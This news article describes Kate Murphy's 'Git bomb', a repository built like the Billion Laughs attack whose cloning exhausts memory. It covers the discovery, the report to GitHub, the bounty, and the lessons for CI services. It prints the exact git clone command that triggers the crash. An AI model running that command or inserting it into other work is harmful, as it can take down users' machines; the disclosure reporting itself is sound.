A quirk in the way Git handles data deduplication can be exploited to crash most computers with a single Git command.
Developer Kate Murphy said this "Git bombing" can be pulled off by creating and organizing a repository of just 12 4KB objects so that cloning it fills up all available RAM and swap space until the machine either falls over or the Git process is killed – a denial-of-service, in other words.
The crash is triggered with the following command:
$ git clone https://github.com/Katee/git-bomb-segfault.git
By using a technique similar to the Billion Laughs XML bomb, the Git Bomb floods storage and memory by trying to create a billion objects.
Murphy told The Register she discovered the oddity in the open-source code management tool while working with fellow developer Wesley Aptekar-Cassels to examine the way Git handles the nesting of large objects.
"I wasn't looking for this bug in particular I was just exploring how git handles weird situations with Wesley," Murphy explained.
"With him I learned a bunch about git internals by crafting many weird repos, exploring the behaviour with a debugger, and reading relevant source code."
After crafting the proof-of-concept repo, Murphy said she reported the issue to Git-hosting biz GitHub, which has since kicked out an update to reject the Git Bomb repositories, and this week credited Murphy with the bug discovery and a bounty from Hackerone.
Murphy said that while the issue wasn't a straightforward security flaw that put machines at risk, it illustrates the problems and quirks that can arise when running continuous integration developer tools.
"It's not really a random flaw, it's just a hard balance to strike. Github and other services like them (especially CI services that run your entire test suite) need to do a bunch of computation for you," the programmer said. "Vanilla git does have some specific flaws when it comes to the directory walking. Companies have needed to write their own code to be able to handle repos beyond a certain size."